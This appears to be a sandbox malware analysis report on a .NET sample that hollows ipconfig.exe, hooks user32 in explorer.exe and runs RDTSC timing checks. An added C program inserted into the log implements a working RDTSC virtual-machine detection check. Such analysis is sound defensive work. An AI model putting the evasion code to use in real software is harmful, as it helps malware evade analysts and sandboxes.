            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, Bohy8GG5IYcfb6Hpyw.cs High entropy of concatenated method names: 'Dispose', 'qPAAk2nOCK', 'YDtU6heK4C', 'KWaLLdN3E4', 'rdtAx5uMiZ', 'JjGAzvA5DY', 'ProcessDialogKey', 'gBlUH5oJ89', 'vLtUAZaqCj', 'Em3UU6K7o8'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, HK7o8Ix7Sef3O4yWON.cs High entropy of concatenated method names: 'llqEAvS6Rv', 'hjXEq0tgNr', 'VlSEQohIH4', 'Wp1EgjOy18', 'GjBEGorJjd', 'uoTEuiORH2', 'zxiEcoGRbh', 'u01C8VaYIt', 'MB8CmaqJh6', 'NFwCk4ZY4b'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, vIVW76QciyDMhnTEs5.cs High entropy of concatenated method names: 'eM8AsB0K75', 'aNNAonsBGR', 'veHAFreU7N', 'DvZASnAyM0', 'aHKAn1G1F6', 'Ft9AX87kky', 'uObC99ga70hahttdWZ', 'oWN6sMzEfUU84CbgGT', 'RZtAAI3Xft', 'Mo5AqeWMD3'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, TUmxrsUiBFh387Pp3F.cs High entropy of concatenated method names: 'faDZJMbuX', 'ecLTOA3JW', 'IZ33ABbpf', 'uvA1ZchFm', 'u1PIoDNYD', 'saMa5RitG', 'oqbih3VhsZNItarrpa', 'XyRpqxImN4jTEnR8Ys', 'RgBC8BR3P', 'j67yLlkaB'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, uba7PbrorjVOM4GOH5.cs High entropy of concatenated method names: 'iwtwmLoq8J', 'jYRwx2N403', 'F29CH1fFkH', 'l9wCAwnrtB', 'D12wVNfwnp', 'GXywhxW7Rn', 'prVw23n4SW', 'PMTwDjpbrm', 'volwfol48T', 'Dp9wKctIqP'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, hvp7roBlu5tt8sCfCj.cs High entropy of concatenated method names: 'NJHsgmQBXC', 'SKns7Tg6jp', 'YmLsc9hF64', 'O1Rcx6CWUA', 'D2eczSdLVw', 'To7sH1VV2k', 'PxYsAiIyAt', 'AOMsUkasTb', 'qFgsq8U6uE', 'luMsQcdoEi'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, bLPwuclivPPYX0pkcA.cs High entropy of concatenated method names: 'o5TsM3VgYr', 'ErHseXy41h', 'xJMsZafoCU', 'fxVsTyhGwV', 'MwssRIndVd', 'lFvs3mCwn3', 'QsQs1V8EYy', 'aA3sNiV9wk', 'GZjsIBTnnN', 'darsangqa9'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, fbwr5b7b1tBIX1pc65.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'VEcUkO8BG2', 'mZ7Uxfi0o6', 'h5WUzOHyuU', 'cmXqHuHGp8', 'lhTqAjKTpk', 'b0lqU6iX8q', 'vh2qqbQcq5', 'DAX9BE19u5MfNstXk20'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, CF6at9d87kkyRS2U6N.cs High entropy of concatenated method names: 'AlaciAhbLP', 'E74cGABQcW', 'iarcurfmMM', 'gqNcsQgIwP', 'GHRcoujEec', 'aCtu9LAm2Q', 'VfjurgbFiH', 'QKku8UJbyi', 'lYOumeJwmd', 'VJKuk83NGP'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, ggRwXVvoU8G6iTnm8Z.cs High entropy of concatenated method names: 'KM0wFW5mVQ', 'crawSGPbDE', 'ToString', 'td9wgupkJF', 'QqMwGYUsyJ', 'pZKw7CAcj7', 'rvZwuwvwfR', 'gTwwcwD8KB', 'acJwsa9ZBy', 'dI8wojQoxM'
            Source: 0.2.JHnNxt6Pnb.exe.3d8ddf0.2.raw.unpack, VB0K75NHNNnsBGRN1j.cs High entropy of concatenated method names: 'up0GDQKKEn', 'tAVGfFTdI3', 'xV7GKb1IZh', 'Bm7Gv1raFM', 'ww0G9La25r', 'dR4GrWnMRo', 'YloG8VgHnp', 'OyyGm9w39o', 'qTCGkR1GEP', 'nIoGxRloGg'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, CVk4BkAqgtM4EmPgrkO.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'VNkyD6ocw8', 'kPfyfapMrJ', 'YyQyKOfWx3', 'K77yvhB63s', 'vLJy9JDkxX', 'WeByrVe1m7', 'n1Qy87Cknb'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, E6Kw9PIeHreU7N1vZn.cs High entropy of concatenated method names: 'NvA7Thkox4', 'IsZ73rrsgx', 'C4v7NlgbcR', 'Byd7IsFZqC', 'tPj7nUkSEK', 'gIJ7Xpkjsb', 'NPC7w0xiEZ', 'iWO7Cp3mXA', 'QHa7EaPf6p', 'ieg7yGRfSw'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, M5oJ89kPLtZaqCjIm3.cs High entropy of concatenated method names: 'PcqCdwLxXp', 'gFSC6x51Ja', 'lkIC0F4bVw', 'XlECOBAVOW', 'JJaCDWpEwf', 'plrCYULx99', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, PXLMp9OZGUdw2XHrZK.cs High entropy of concatenated method names: 'KAGcJrGLjf', 'rMZcMoK8Z6', 'RxPcZnH4iB', 'tegcT2aPP2', 'NrYc3Zi7e5', 't2nc11umAq', 'ynqcIWUb8y', 'Kkycanw09h', 'X6cOfeHyKydC6kL5fXY', 'BTDMMAHo3GeQSfkArVV'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, cifycjzu6Uius0SMBh.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cFLEpyqWJ3', 'en6EnatmFi', 'hsUEXsNrwq', 'qtUEweJBdh', 'JROECIbWER', 'uvUEExc55T', 'x9sEygeCRI'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, ICJHE62k18iImlcG7g.cs High entropy of concatenated method names: 'qrhpNLnaOs', 'omNpIhIKyE', 'EFJpdidDkT', 'OsJp6yjjkS', 'ml6pOX4UWQ', 'qaspYeroUm', 'pHgpBRltUJ', 'DvApWAAxnP', 'UU1p5elWJl', 'eHJpVJxOZ5'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, iY9LscoqRNGQNby1ks.cs High entropy of concatenated method names: 'p7fqiOFkHP', 'SVKqgoPu1a', 'Qs6qGTTkqH', 'sqbq7VEC9F', 'EQtqu6bCU8', 'MgOqcj2uxj', 'gLtqsYeN45', 'Hpwqo9WsEC', 'JT1qtraqVC', 'rOyqF2W6sH'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, YrQFSYAHoqOHrypnR1O.cs High entropy of concatenated method names: 'B5UEMQUe9Z', 'uQTEeZPfaO', 'S4MEZ6nEeD', 'XwjETnquJj', 'VHhERP6Ho9', 'KY0E3TfmZ7', 't0BE1pBuQG', 'VbNENLA0MA', 'fifEIudOOI', 'qomEa1a3x0'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, byM0dcaLI90JrAHK1G.cs High entropy of concatenated method names: 'VTSuRqfghv', 'EeUu1tL4ar', 'rsD70x5YYI', 'tW57OIH4d6', 'KXw7YcdI2h', 'lgn7bxWTmU', 'na47BUuA0l', 'z057WjtCd5', 'uRp7lD5qB9', 'b7675PkPBa'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, Gt5uMimZYjGvA5DYGB.cs High entropy of concatenated method names: 'JoBCgHgKpp', 'HCMCGEMXVx', 'kJkC7pyvuQ', 'WjKCuVURDY', 'hKTCcx7SDf', 'W5QCsCfv2D', 'awHCoyaZNy', 'LhpCtQxvrk', 'pqNCFCpcmS', 'Ln3CSqfT2K'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, Bohy8GG5IYcfb6Hpyw.cs High entropy of concatenated method names: 'Dispose', 'qPAAk2nOCK', 'YDtU6heK4C', 'KWaLLdN3E4', 'rdtAx5uMiZ', 'JjGAzvA5DY', 'ProcessDialogKey', 'gBlUH5oJ89', 'vLtUAZaqCj', 'Em3UU6K7o8'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, HK7o8Ix7Sef3O4yWON.cs High entropy of concatenated method names: 'llqEAvS6Rv', 'hjXEq0tgNr', 'VlSEQohIH4', 'Wp1EgjOy18', 'GjBEGorJjd', 'uoTEuiORH2', 'zxiEcoGRbh', 'u01C8VaYIt', 'MB8CmaqJh6', 'NFwCk4ZY4b'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, vIVW76QciyDMhnTEs5.cs High entropy of concatenated method names: 'eM8AsB0K75', 'aNNAonsBGR', 'veHAFreU7N', 'DvZASnAyM0', 'aHKAn1G1F6', 'Ft9AX87kky', 'uObC99ga70hahttdWZ', 'oWN6sMzEfUU84CbgGT', 'RZtAAI3Xft', 'Mo5AqeWMD3'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, TUmxrsUiBFh387Pp3F.cs High entropy of concatenated method names: 'faDZJMbuX', 'ecLTOA3JW', 'IZ33ABbpf', 'uvA1ZchFm', 'u1PIoDNYD', 'saMa5RitG', 'oqbih3VhsZNItarrpa', 'XyRpqxImN4jTEnR8Ys', 'RgBC8BR3P', 'j67yLlkaB'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, uba7PbrorjVOM4GOH5.cs High entropy of concatenated method names: 'iwtwmLoq8J', 'jYRwx2N403', 'F29CH1fFkH', 'l9wCAwnrtB', 'D12wVNfwnp', 'GXywhxW7Rn', 'prVw23n4SW', 'PMTwDjpbrm', 'volwfol48T', 'Dp9wKctIqP'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, hvp7roBlu5tt8sCfCj.cs High entropy of concatenated method names: 'NJHsgmQBXC', 'SKns7Tg6jp', 'YmLsc9hF64', 'O1Rcx6CWUA', 'D2eczSdLVw', 'To7sH1VV2k', 'PxYsAiIyAt', 'AOMsUkasTb', 'qFgsq8U6uE', 'luMsQcdoEi'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, bLPwuclivPPYX0pkcA.cs High entropy of concatenated method names: 'o5TsM3VgYr', 'ErHseXy41h', 'xJMsZafoCU', 'fxVsTyhGwV', 'MwssRIndVd', 'lFvs3mCwn3', 'QsQs1V8EYy', 'aA3sNiV9wk', 'GZjsIBTnnN', 'darsangqa9'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, fbwr5b7b1tBIX1pc65.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'VEcUkO8BG2', 'mZ7Uxfi0o6', 'h5WUzOHyuU', 'cmXqHuHGp8', 'lhTqAjKTpk', 'b0lqU6iX8q', 'vh2qqbQcq5', 'DAX9BE19u5MfNstXk20'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, CF6at9d87kkyRS2U6N.cs High entropy of concatenated method names: 'AlaciAhbLP', 'E74cGABQcW', 'iarcurfmMM', 'gqNcsQgIwP', 'GHRcoujEec', 'aCtu9LAm2Q', 'VfjurgbFiH', 'QKku8UJbyi', 'lYOumeJwmd', 'VJKuk83NGP'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, ggRwXVvoU8G6iTnm8Z.cs High entropy of concatenated method names: 'KM0wFW5mVQ', 'crawSGPbDE', 'ToString', 'td9wgupkJF', 'QqMwGYUsyJ', 'pZKw7CAcj7', 'rvZwuwvwfR', 'gTwwcwD8KB', 'acJwsa9ZBy', 'dI8wojQoxM'
            Source: 0.2.JHnNxt6Pnb.exe.3dfde10.3.raw.unpack, VB0K75NHNNnsBGRN1j.cs High entropy of concatenated method names: 'up0GDQKKEn', 'tAVGfFTdI3', 'xV7GKb1IZh', 'Bm7Gv1raFM', 'ww0G9La25r', 'dR4GrWnMRo', 'YloG8VgHnp', 'OyyGm9w39o', 'qTCGkR1GEP', 'nIoGxRloGg'

            Persistence and Installation Behavior

            Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE6
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\explorer.exe: Process information set: NOOPENFILEERRORBOX (8 identical entries collapsed into one)
            Source: C:\Windows\SysWOW64\ipconfig.exe: Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (SetErrorMode flags: SEM_NOOPENFILEERRORBOX suppresses the "file not found" dialog, SEM_NOGPFAULTERRORBOX the crash dialog, so a failing or crashing stage does not stall on a message box)
            Source: C:\Windows\SysWOW64\cmd.exe: Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match, file source: Process Memory Space: JHnNxt6Pnb.exe PID: 6796, type: MEMORYSTR
            Source: C:\Windows\SysWOW64\ipconfig.exe: Code function 9_2_00F63872: DnsGetCacheDataTableEx, DnsFree, DnsFree
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: API/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: API/Special instruction interceptor: Address: 7FFBCB7B0774
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: API/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: API/Special instruction interceptor: Address: 7FFBCB7AD8A4
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: API/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: API/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\ipconfig.exe: API/Special instruction interceptor: Address: 7FFBCB7AD324
            Source: C:\Windows\SysWOW64\ipconfig.exe: API/Special instruction interceptor: Address: 7FFBCB7B0774
            Source: C:\Windows\SysWOW64\ipconfig.exe: API/Special instruction interceptor: Address: 7FFBCB7AD944
            Source: C:\Windows\SysWOW64\ipconfig.exe: API/Special instruction interceptor: Address: 7FFBCB7AD504
            Source: C:\Windows\SysWOW64\ipconfig.exe: API/Special instruction interceptor: Address: 7FFBCB7AD544
            Source: C:\Windows\SysWOW64\ipconfig.exe: API/Special instruction interceptor: Address: 7FFBCB7AD1E4
            Source: C:\Windows\SysWOW64\ipconfig.exe: API/Special instruction interceptor: Address: 7FFBCB7B0154
            Source: C:\Windows\SysWOW64\ipconfig.exe: API/Special instruction interceptor: Address: 7FFBCB7AD8A4
            Source: C:\Windows\SysWOW64\ipconfig.exe: API/Special instruction interceptor: Address: 7FFBCB7ADA44
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: RDTSC instruction interceptor: first address 409904, second address 40990A
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: RDTSC instruction interceptor: first address 409B6E, second address 409B74
            Source: C:\Windows\SysWOW64\ipconfig.exe: RDTSC instruction interceptor: first address E39904, second address E3990A
            Source: C:\Windows\SysWOW64\ipconfig.exe: RDTSC instruction interceptor: first address E39B6E, second address E39B74
            All four sites execute the same instruction sequence:
                0x00000000 rdtsc
                0x00000002 xor ecx, ecx
                0x00000004 add ecx, eax
                0x00000006 rdtsc
            The ipconfig.exe addresses sit at the same offsets from the image base (0x9904 and 0x9B6E) as the JHnNxt6Pnb.exe ones, consistent with the hollowed ipconfig.exe running a copy of the same payload.
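The intercepted sequence is the classic RDTSC timing check: the malware reads the time-stamp counter twice in quick succession and treats a large delta as a sign that RDTSC is being trapped by a hypervisor or single-stepped by an instrumentation layer. The following is an added example written for this page, not code from the report or recovered from the sample. It uses the compiler's __rdtsc intrinsic on x86 (with a clock_gettime fallback on other architectures so it still builds), and the 1000-cycle threshold, the 32-sample loop and the use of the minimum delta are my own assumptions for illustration, not values taken from the sample.

```c
/* Added example, not code from the report or the sample: a minimal RDTSC
 * timing check in the spirit of the intercepted sequence
 *   rdtsc ; xor ecx,ecx ; add ecx,eax ; rdtsc
 * Two back-to-back reads of the time-stamp counter cost a few dozen cycles
 * on bare metal; when a hypervisor traps RDTSC, or an analysis layer
 * single-steps it, the delta grows by orders of magnitude. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
static uint64_t read_tsc(void) { return __rdtsc(); }
#else
/* Non-x86 fallback so the example builds everywhere; the real check is x86-only. */
#include <time.h>
static uint64_t read_tsc(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
}
#endif

#define VM_THRESHOLD_CYCLES 1000u   /* assumption chosen for illustration */

/* One measurement, mirroring the intercepted code: read, a trivial ALU
 * operation standing in for xor ecx,ecx / add ecx,eax, read again. */
uint64_t rdtsc_pair_delta(void) {
    uint64_t t1 = read_tsc();
    volatile uint32_t scratch = 0;
    scratch += (uint32_t)t1;
    uint64_t t2 = read_tsc();
    (void)scratch;
    return t2 - t1;
}

/* Smallest of n deltas. Interrupts, context switches and frequency changes
 * only inflate a delta, so the minimum is the cleanest estimate of what a
 * single RDTSC pair costs on this machine. Returns UINT64_MAX for n == 0. */
uint64_t min_delta(const uint64_t *deltas, size_t n) {
    uint64_t best = UINT64_MAX;
    for (size_t i = 0; i < n; i++)
        if (deltas[i] < best) best = deltas[i];
    return best;
}

/* Verdict used by the malware-side check: a delta above the threshold is
 * taken as "RDTSC is being trapped, so we are probably being analysed". */
int looks_virtualized(uint64_t delta, uint64_t threshold) {
    return delta > threshold;
}

int main(void) {
    uint64_t d[32];
    for (size_t i = 0; i < 32; i++) d[i] = rdtsc_pair_delta();
    uint64_t m = min_delta(d, 32);
    printf("min RDTSC pair delta: %llu -> %s\n", (unsigned long long)m,
           looks_virtualized(m, VM_THRESHOLD_CYCLES) ? "probably virtualized or instrumented"
                                                     : "looks native");
    return 0;
}
```

Sandboxes defeat this class of check by not trapping RDTSC (letting the guest read the hardware counter) or by applying a TSC offset so the guest sees a plausible delta; the report's "RDTSC instruction interceptor" lines show the analysis engine recording these sites precisely so that the measured delta can be kept small.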
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Memory allocated: E30000, memory reserve | memory write watch
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Memory allocated: 2BB0000, memory reserve | memory write watch
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Memory allocated: 29B0000, memory reserve | memory write watch
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Memory allocated: 8B60000, memory reserve | memory write watch
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Memory allocated: 9B60000, memory reserve | memory write watch
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Memory allocated: 9D60000, memory reserve | memory write watch
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Memory allocated: AD60000, memory reserve | memory write watch
            (These are MEM_WRITE_WATCH reservations. The .NET runtime's garbage collector reserves its heaps the same way, so for a .NET sample like this one the write-watch allocations are weak evidence on their own.)
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Code function 4_2_00409AA0: rdtsc
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: Thread delayed: delay time: 922337203685477 (this is INT64_MAX expressed in milliseconds, i.e. an INFINITE wait rather than a timed sleep)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe: Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe: Window / User API: threadDelayed 5458
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe: Window / User API: threadDelayed 4221
            Source: C:\Windows\explorer.exe: Window / User API: threadDelayed 9798
            Source: C:\Windows\explorer.exe: Window / User API: foregroundWindowGot 886
            Source: C:\Windows\explorer.exe: Window / User API: foregroundWindowGot 860
            Source: C:\Windows\SysWOW64\ipconfig.exe: Window / User API: threadDelayed 2024
            Source: C:\Windows\SysWOW64\ipconfig.exe: Window / User API: threadDelayed 7945
            Source: C:\Users\user\Desktop\JHnNxt6Pnb.exe: API coverage: 1.7 %
            Source: C:\Windows\SysWOW64\ipconfig.exe: API coverage: 1.9 %
